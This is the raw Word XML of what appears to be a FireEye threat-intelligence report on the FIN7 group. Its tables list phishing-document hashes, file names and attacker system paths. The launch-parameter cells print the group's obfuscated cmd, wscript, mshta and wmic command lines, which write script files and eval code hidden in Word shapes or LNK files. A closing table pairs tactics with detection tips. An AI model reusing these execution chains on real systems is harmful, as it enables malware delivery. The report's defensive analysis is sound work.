      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1A91078D"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55AC5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C07B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using VPS infrastructure with low reputation</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5AB2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Inbound and outbound connections from and to non-standard IP ranges, especially from international Virtual Private Server (VPS) providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1B3BA524"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DB60D2"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1E45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using legitimate services including Google Docs, Google Scripts and Pastebin</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670BC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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="70E265EF"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3B135E"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62ED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using DNS via A, OPT, TXT records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3713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Unusually long or numerous DNS A, TXT and OPT record queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="434D18C3"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6D72F7"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E052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domains registered with REG.RU</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C46B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Newly observed domains registered via REG.RU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6F699B9D"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BBCEA6"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F3A00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domains registered with NameCheap</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4F11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Newly observed domains registered via NameCheap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="3DCEF967"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83C933"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CA8A6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domains registered with odd format and top-level domains</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2CB2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Unusually long or numerous DNS queries with the structure [a-zA-Z]{4,5}\.[pw|us|club|info|site|top] (eg. “pvze[.]club”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="42CACAF2" w14:textId="77777777" w:rsidTr="009403EE">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42AF7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Maintain Presence</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53752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C2 domains registered with hyphen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6"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C12C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Outbound connections to newly registered, hyphenated domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78D874E3" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Table 4: FIN7 TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309138A" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>FIN7 Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F5E57"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FireEye is providing these granular technical indicators so that interested parties can better understand the threat actor and search for their historical activity across enterprise networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012F4D7" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phishing Documents Droppers</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13395" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4512"/>
        <w:gridCol w:w="4064"/>
        <w:gridCol w:w="1662"/>
        <w:gridCol w:w="3157"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="15000493"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47AFA8"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Filename</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2A617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E95311"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249F4D"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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="5DD3335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BC265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menu.rtf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178E2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c14eb54769ff208a2562e4ef47958d9e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B551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F136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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="5F60C26A"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64CB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F1DA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76eb6f124fba6599a54e92b829c55b63</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5C73A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CCC2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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="4AB8EFC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0F554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3-ThompsonDan.rtf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47F0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4b783bd0bd7fcf880ca75359d9fc4da6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E5C2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6737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BELLHOP</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="26FC967B"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D291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claim.rtf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2EA6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af53db730732aa7db5fdd45ebba34b94</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BF12F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46C4E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BELLHOP</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="31D3364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25A7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order.rtf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A629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cea2989309ccd5128f437335622978f1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892CC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88A94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BELLHOP</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="25EE689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D522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order.rtf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8DB6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cf4ccb3707e5597969738b4754782e4d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8DDB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1962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BELLHOP</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="3B4CE80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2E76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Doc2_rtf.rtf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8298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2dc0f4bece10759307026d90f585e006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2FC2A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4C90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2C82FDC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6D62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7156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37759603c6cd91ebc8a1ea9ac0f2d580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1B0E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1B2C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0186365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4E820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quote.rtf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DF0C0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3c0bd71e91e0f18621ba43de4419f901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DC447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3AD1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104B772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E058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Doc2_rtf.rtf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A9D1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562a64f1c09306d385962cf8084b6827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CAB3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4D94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18E24F6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26A9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information.doc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300C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5dace5ac5ba89c9bba4479264f75b2b6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63F2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5F44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7CDB4BC3"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0C9F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Doc_rest_rtf.rtf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4FA1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619aa4e6c9db275381ab0e7fc7078f5f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FD42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DBDD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04A3DC59"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F667F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FE0B7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67c9bfd4d6ac397fb0cd7da2441a6fe2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0AFE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BFD03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7ADDBFD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48FA4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Doc33.docx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B750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6a5a42ed234910121dbb7d1994ab5a5e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8930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238CC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404756D9"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1538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info_.rtf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1622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6ac5ae6546746e3a9502cc489b71146e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3D09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A3999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771E7E1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DB90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bmg.docx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3ED9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754fc509328af413d93131e65fc46d31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25B5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BE49B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355F439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D73FC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Doc_0405_1.rtf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B745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7b2315ff1f2d763857aa70ad34b75449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E123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0957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0284F5F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B07B6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7A00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99975b5ee2ddd31e89c9bdda7a3871d9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6B19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C17A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6D1618B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DBBA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doc0505_1.rtf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9450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9eb71edd5ec99294a1c341efa780b1b1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E3A87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C386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48EC855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BF2C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DonovanR.docx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2B51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b5829caad7c448c558cb1dab2d9f4320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D2ED1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DF8B3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0ECEE839"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C506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rising star.rtf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87A1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c8b8420d1503ae48ff35362f5d29eeb3</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413E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05E9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55CA7A8A"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AF7E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inf6.docx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9EF7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e494356fc0db7ef6009d29e5ae869717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8BA7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A98E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w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="25C3AE9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CBD2C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Claim.docx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62038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06b9e2fdd2c0eeb78b851c93ca66f25f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2ED0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0FF1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BELLHOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="7919ED9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0C85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order.rtf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6A92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80eed9f87a18b0093eb3f16fa495b6f7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8C0D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E3C56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BELLHOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="275C3DFB"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BDAC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Details Joseph.docx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9080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b4d48f3e1ae339f2fcb94b7abceecfff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A61B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84AF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BELLHOP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="488BFB2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C2879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order.doc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D8C2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e2a6b351c276d02d71e18cd0677e8236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97C7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C2E9B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BELLHOP</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="601D44A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2FB8F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D726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b14bc8cbc7f2d36179ebff96ade6d867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F3CA5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A619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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6DBA14F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DF5E1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features.doc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2A2EC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bbd99ef280efebe9066c0aef91bf02cd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51D4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4B3E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DRIFTPIN</w:t>
            </w:r>
            <w:r w:rsidRPr="009403EE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>HALFBAKED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="52244E93"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C22B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doc2709.rtf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0618C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01d666fcbc4cdcedbfe7963f498e7858</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F05D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45E3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924AC9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E749F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doc_n0908.rtf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0DB6D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03e85ad4217775906e6b5ceae8dc27af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2D1B3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7A12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9A0CCC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FCF8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C373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0d6619481cfd29791a51ebb42ace5c03</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42B6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573B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CF7495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DDB8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0772A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0e0a51489054529a9dcb177d39f08b81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C5628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61BF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C002E8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C4B64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doc0719.docx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9122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101bdbbd99cfd74aa5724842404642f2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ECF8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FCBD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A8F879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04B6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doc0507.docx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D62EF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17fabe288d640476a70154c59d5a1ba1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D561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14B5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AB3ACA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525B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info_1.rtf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8BBE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189c5a090d2b3b87ab65a8b156cd971e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1309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6A9A7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211C1D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F367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C606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1a6c18967f4ce1c91c77098af4957e6e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FA7B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61C6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6054F3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46EB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Mail.rtf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B886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1a9e113b2f3caa7a141a94c8bc187ea7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1520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8233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AEF5B2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BBA8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Doc_rest_n_rtf.rtf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29C1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1f5022a02c82fbe414dc91bf3f1b5180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FF84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7B5E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6776F2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8881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D8C9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1f98c4ff12fc2c6fbf8247a5b2e4e7f4</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AB64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32947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D88E60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EF182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doc1909.docx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7EA8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1fbe77a3b5771ce4f95e02a49c5b7f30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0775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2293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433965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ECCC8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doc_n0808.rtf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6FC70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21926646a658bdf39cf28cdfbb1aced7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339C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0BB5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B02F54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1C14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doc0507.rtf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51EE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22ad7c05128ca7b48b0a2a4507803b16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40A3D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DA97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12784B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8875A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15EE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22e7d4f7401ef34b3b6d17c15291c497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5CD1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CFF64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7E00372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1B3D9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menu.rtf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17A7C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24fab1e9831e57307d17981abaabf960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8C1F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B104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4824D2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5099D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2-order.docx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2A189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28ad8e3a225400a1d00f6023f8e6c9c8</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FDD9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8662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8C8ADA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D667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doc0610.docx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3C12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29a3666cee0762fcd731fa663ebc0011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A6209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3DFA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E51917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BAB1B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doc2209_1.rtf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408F5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2d36634974c85eff393698b39edc561c</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C8295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E5D6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9DBDF14"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45FC2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E795C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307a9ce257e97189e046fa91d3c27dab</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68ACF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C014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26B98F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09E1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19E04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325844f1b956c52fc220932bc717f224</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BEAB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BEDE8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781B9D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D71C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doc0910.rtf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67D8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3917028799d2aa3a43ec5bad067e99a5</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F6FE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8CB1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AF28BB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C428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577E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397d45b6001919b04739e26379c84dd9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8BC9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C051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78F70C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E58D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docr.rtf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6867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3a303f02e16d7d27fa78c3f48a55d992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4839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D849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7F5A5C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E650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oliver_davis.docx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AEA9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3b12f36a01326ec649e4def08b860339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BA4A6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C5590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8D705E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E5B8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doc2209.docx.docx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E8E3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402c34d7d6ce92bf5a048023bd2fde4a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6ED4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D8D7A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89860C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09502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Dooq.docx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5479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41c6861313e731bd3f84dd70360573ce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BC75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06B6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201B15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C49D1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info.rtf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CC22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42a2a2352f6b1f5818f3b695f240fc3a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572E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9A21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7DD7FCB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FDF0F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james.docx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10EA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499ebef3ab31a2f98fc8a358bd085b0f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0E61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BF16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7EBEDD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06F13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doc1007.rtf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5FB0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4b7a742d5c98fc62f0f67445032e7bc6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F9841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4CE4A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23E488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1167B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tem6.doc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C5CBC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4bf691809224d17e49cebb071d22a867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2840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5197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8FD47B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7105F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FE7A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511af2b4c62fa4c2bb91f3be1ca96094</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B102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B857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06CC68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B5B7D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59691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52cf6a63da29331d805a5a9b5015580f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21C9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34C4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783B313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09F00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doc2209.rtf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4A3B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560e72858ee413d7a6f72fff5ab7577b</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E99E7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71B5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E24ADE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DD3E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AF499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5a0b796c7a6040e02c822cac4475f11a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A6CF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6E14E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D38C5C9"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300B1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doc0717.rtf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25AC6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5d49b444734b003b6917b81f0a779b3e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5480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E102E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558902A"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088BA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E28B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5d9525b48870dc438130bd96fb8c5b66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0E23F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8751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C33709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9F6B6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E9426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5dd2e677fd1d65f051b7f54e7402721f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A696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ECA2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73EFD5A"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72E2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Dooq.docx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585D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63e2eb258a85ed4e72f951cdbff2a58e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0DAC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A56C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0F091D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8A43A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doc0720.rtf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52555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6a860285a6f7521995151a2a0cb6e316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A0546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D3BC6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C34A0D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17C2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doc0719.rtf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94D51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6adec78e874232722c3758bbbcb95829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C0D1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2EB0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8B6B66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0C441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virus.docx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9DA9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70f0f8db551dd6b084682188c3923e26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77EB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9E9B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EB6F75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8134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check.rtf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CFFE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72d973ebfbc00d26170bfafdfbbd0179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5189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23DB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5B60F8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3CA69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Doc_0405.rtf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CEE5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74165408ff12d195fb9d68afe0a6011e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3C2EF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E2BE9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DA12D25"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7F81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oliver_davis.rtf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9C6B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793511c86a0469d579ff8cc99a7311e3</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DDBC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A4A6D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E7F24D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4DB0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doc_n0808.docx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72F9E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79628a598303692238cc4aeb19da6fed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E92BB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3FED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01544C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B561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5C606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7d664485c53b98180e6f3c69e9dfa81e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EBC7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5189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A91D52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FC46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1B56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82a32d98e68891625b6de67a9d0b61c6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E199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CDD5D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9DE481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ABF6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document.doc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107D4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853a53419d9dbc606d2392b99e60c173</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A317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DA11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1DF688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7FBC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doc2806.rtf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5CF1B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856cec68ddd28367c0d0f0a6f566187a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B1FA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F27E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C8274F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B9D7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8405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8608b31a446f42a7f36807bd6c16d2c0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D2E58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BC151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043AE23"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CDFE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AC14E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8bd798e89d075827cc757b9586f15ce2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AA06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D6CB5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111D5F4"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7C2C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D3C95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94771bcf572d5c0b834f73d577f06cc8</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DF57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2B095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08D5E8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499D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doc1610.rtf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2B0E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973377e27b5dffa289f84e62a6833ebc</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E2269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EEF0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3544BD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7131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Doc0725.rtf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7DF8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9788b3faa29ba9eb4cae46f3c249937e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B014B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175C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E6E491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EE078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A324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9b87f9f6498c241f50208f9906907195</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B57F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D751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79D3287A"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F6AA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0A3EC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a5f75333d0c81387a5a9c7696b967a20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17C2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9C9A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A07B59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C4CDC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doc0610.rtf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161B4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a8e312d0c230e226e97e7a441fadbd85</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21A5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E53A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7668746B"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CE40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doc2_r_new.rtf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7BA5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a9c50b7761519fb684cdee2d59f99f91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95D3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D7A1D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2357E3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4719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credit details.rtf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A505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aaf42acedc38565f4c33cfdbb09733b9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D42E8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0A8FA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E4AD0E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38C7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doc2.docx_</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39E0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b5cc86726ab8f1fb3c281ab8f935260f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6166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A1E7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5D00B2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3D00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375C7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b6f005236a37367a147f9060c708ccca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E3437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9FAD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7534C6B"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4890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CD84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c0d122bcdcb6ede7fc7f1182e4d0e599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546B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AAB7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70CFAB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A76F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doc2806.docx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78D7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c3f48e69bb90be828ba2835b76fb2080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F117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236C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BA8FDD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FC395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2FC0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c5e94d973ed4f963ddc09ab88def3b5f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FE938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6F23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74534E0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1FBB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581B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c6cddc475d62503a17a34419918e7fc0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36CE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A43A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7510EA1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E5257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doc0714.docx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DAB4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caec3babdec3cf267cc846fd084c4626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5B9D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A8855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D92E754"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F091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doc1909.rtf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116B4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d1f55491472ca747561509106b71eab8</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4E07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72FE4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10EC31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C16F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doc_n0908.docx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CE81B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d38fb2d95812ffa1014e52ef3079e5da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533F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BA81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576D95C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5FF8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catering_.rtf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CDB6A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d5cd1dedf3bf5c943e348a8b84e37b2a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E4B7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70CC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9A99EAA"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190F0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doc0714.rtf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6237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dde72a54716deb88c1ffef2a63faab6b</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F5B0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8EB45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048526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389B8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m1.doc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B4481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e0ca85c0d264b84d977df0c48fd383cc</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3F5C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DCA23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F2FEED3"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8E10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12A1D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e17fe2978ebe1b0a6923acd2ffeda3c2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D6DA1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78A3C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8EAF8E3"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E9CCD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doc2009.rtf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6483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e184219366afb2e6bd0b9502beab1156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161AE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12A9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269CA57B"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5AEED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doc1610.docx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886C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e9154e2f80389b853ab4cf2fe98f1ed2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C829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DBA6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0DC50939"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8520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3F666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edc4f02f265a4aaa552435f293409f01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48E7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E5B7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1AC00C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FF96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doc2_r_new.rtf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3292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ee5a600ef9fd1defe07ea097095d1beb</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3A50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1C17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641F2B6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A74D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5EAF1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effdaf7f61acb277ac44ee4d9bc8900a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6F03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EEED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FA46EB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D005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info_.docx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7684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f2ac2ec8173db4963dc2089ac90b8807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CECD5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A7EF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D70078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391D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Doc0725.docx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1B83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f80a80d25b3393825baa1e84e76ddf6c</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94F1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FC204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D46501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DECD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1.rtf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88E0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fa1c548a5d691ac9ce7bfd929f204261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21F1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30E8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D0E212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7A95B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CE326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fa93c93a02fe2dee8a3b3d1cd82f293f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7121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292F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415E4C0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1994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poisoning.rtf</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5299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faed087e820cad3c023be1db8d4ba70a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E08C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7338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3B9D00F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9693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order.docx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9778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fc661e18137583dc140e201338582a99</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EB88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F100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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1CDDD13B"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3AEDA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SEC_Security_Policy_2017_02.doc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BCFFE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032fe02e54a010d21fd71e97596f4101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B23D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DAFB0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5DCA062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B07E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SEC_Security_Policy_2017_10.doc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E0ACB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14334c8f93f049659212773ecee477a2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4EA2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CA4B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0547F4B6"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5BFA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VargheseJ.doc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9F971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2abad0ae32dd72bac5da0af1e580a2eb</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747C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D7A7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36DF5C5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83966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SEC_Security_Policy_2017_03.doc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2DAE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37d323ffc33a0e1c6cd20234589a965d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84CB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87FC1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5BB0B19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E763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2017.doc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EBBD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5a88e3825c5e89b07fa9050b6b6eca7c</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C3942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1744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429E88A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9B18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07A4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6ff3272cd9edf115230bad6a55cb3ca8</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2C0C2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DB718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7847D38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ED55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EDGAR_FILLINGS_RULES_2016.doc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EC1EE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7bd2235f105dee20825b4395a04892bf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6AC6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4878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3C4A264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8BFB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SEC_Security_Policy_2017_05.doc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3D372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8fa8d4c30429c099dc7e565e57db55c0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795C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EB41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28DEF90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AC5D9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SEC_Security_Policy_2017_06.doc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8E7E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ccd2372bb6b07f1b5a125e597005688d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9FC95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FBAB1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54209CE1"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0373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Important_Changes_to_Form10_K.doc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833F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d04b6410dddee19adec75f597c52e386</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31EE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99D2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3C7B535B"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2F34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06F7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f20328b49ec605fd425ed101ff31f14b</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595A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042E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75B48F89"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39AC7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SEC_Security_Policy_2017_07.doc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9931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f74958adcfb11abcb37e043013f6a90f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0C31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E6D6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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="02D6FA2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F364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Filings_and_Forms.docx</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5A7B5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47111e9854db533c328ddbe6e962602a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399A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E93D0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 (Downloader)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="6BF84F74"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4878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doc.doc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51EB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189c72bfd8ae31abcff5e7da691a7d30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CE86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FC52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31B59BB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0CF9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protected_instructions.doc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D6D24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302ab8bd6a8effa58a675165aa9600a2</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4EEF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3685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708677C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22D5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Doc2.doc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54485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40c4c02d1e506a5ffc2939ec0ee8e105</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66F0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314DE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2E4FCBB4"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AEC7F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3528579_security_protocol.doc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3B30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58fbf6f9405327d8d158a1eeac19b81a</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D072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C65FA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71EA0BE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4689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check.doc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25A1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5972597b729a7d2853a3b37444e58e01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B0025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5668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74342AA8"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D7A7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2EEE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6fff1d68203f8d23ccd23507ba00b9df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9146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504A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7C6D99F3"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5559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check.doc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5788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762eef684e01831aa2f96031eff378bf</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0B1A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06D6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3AD36C37"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B7EB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check.doc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E2A54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9b1af2d9c0c0687c70466385800b6847</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EABD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7D5FD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29D54F1F"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EB460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Doc1.doc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EA88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bb1a76702e2e7d0aa23385f24683d214</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8D4A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7E49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14F78EAE"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49198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check.doc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650B8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d4088f8202e0eb27f90e692f988f0780</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7869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6C835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7A01032C"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2956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invoices.doc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DB88D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dc8b30c5253f02a790a31f2853fe41f8</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1E46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89294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3446462D"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E397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blah.doc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2F9F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e020668055eb1d22710aa07f72860075</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0196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F536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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="007B9F00"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FF054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photos.doc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7AB2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c517f48bf95a4f3ecba2046d12e62c88</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24E1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FA181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GRIFFON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="1AD00242" w14:textId="77777777" w:rsidTr="009403EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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8F78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test.doc</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1454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d7ca38e21327541787ab84bde83d7f81</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F0AE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c>
          <w:tcPr>
            <w:tcW w:w="31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762E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GRIFFON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F3574C" w14:textId="77777777" w:rsidR="009403EE" w:rsidRPr="009403EE" w:rsidRDefault="009403EE" w:rsidP="009403EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009403EE">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Additional Malware</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7365" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4065"/>
        <w:gridCol w:w="1875"/>
        <w:gridCol w:w="1425"/>
      </w:tblGrid>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="5241192F"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68D6B9"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MD5</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02686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6CE2A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r>
      <w:tr w:rsidR="009403EE" w:rsidRPr="009403EE" w14:paraId="556CE29B"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6FF0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5f73beb23c45006ad952a71fa62c6f9f</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5AC8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BABYMETAL</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CF57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53966AD"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3E47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a3754fba24f85d1d1bb7c0382e41586b</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45ED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BABYMETAL</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C43B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8EA539C"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24C91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dad8ebcbb5fa6721ccad45b81874e22c</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42A9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BABYMETAL</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735E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E1A3CC3"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965C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ecd8879702347966750c37247ef6c2e6</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5B99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BABYMETAL</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1A757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984A49D"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99E47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039d9e47e4474bee24785f8ec5307695</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DDE0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BIRDDOG</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0AB3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5FE26C3"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ABE4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92dfd0534b080234f9536371be63e37a</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5D03E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BIRDDOG</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6AF3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5F4D8EF"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21BE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188f261e5fca94bd1fc1edc1aafee8c0</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8DE0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E08F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DD48843"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3310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2828ea78cdda8f21187572c99ded6dc2</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13C4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6500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7225DCE"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7C18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291a17814d5dbb5bce5b186334cde4b1</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D52AD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D965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60BE18A"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7591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4b3dac0a4f452b07d29f26b119180bd2</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697F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534F0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D65BE73"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D839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4eda75dfd4d12eda6a6219423b5972bd</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31694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A051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FAD1E1B"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484A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6e9408c338e98a8bc166a8d4f8264019</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59FD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5CDD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DAA73B0"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68B3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749c5085cda920e830cfed32842ba835</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AD7B4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5EBDF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99FC8C7"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25014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80b022b39d91527f6ae5b4834d7c8173</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AFC3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DAF9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B8AA419"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E64FA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8ae284d547bd1b8bd6bc2431735f9142</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89F5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A6E4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11F0AE2"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C632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8e1e7f5ad99e48b740fd00085eab1f84</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8522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79D6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7182AC0"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F161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9ae433cd5397af6b485f1abb06b2c5a2</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4216A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6B869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9F9D91F"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2CC9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be1154e38df490e1dcbde3ffb2ebd05c</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2859F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0F7B4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5479062"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0B2A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c6b57e042ceadb60d6fab217d3523e17</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76626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A8DD8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714E8E9"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7AE1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c6ec176592ea26c4ee27974273e592ff</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2DE7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1BC9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D4A834B"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37FE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dd4f312c7e1c25564a8d00b0f3495e24</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1EBB6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08E5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BB17343"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9BB4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facd37cd76989f45088ae98de8ed7aa0</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66A8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61A2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4A2A9AD"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9FCB0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4dc99280459292ef60d6d01ed8ece312</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3C7E6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DRIFTPIN</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CAB58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72ECEB4"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541D2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63241a3580cd1135170b044a84005e92</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EF29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DRIFTPIN</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1F8B4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B7207C3"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BC93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70345aa0b970e1198a9267ae4532a11b</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7EF3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DRIFTPIN</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40AE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A38B4A5"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A099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de50d41d70b8879cdc73e684ad4ebe9f</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2CF52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DRIFTPIN</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C4A69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15D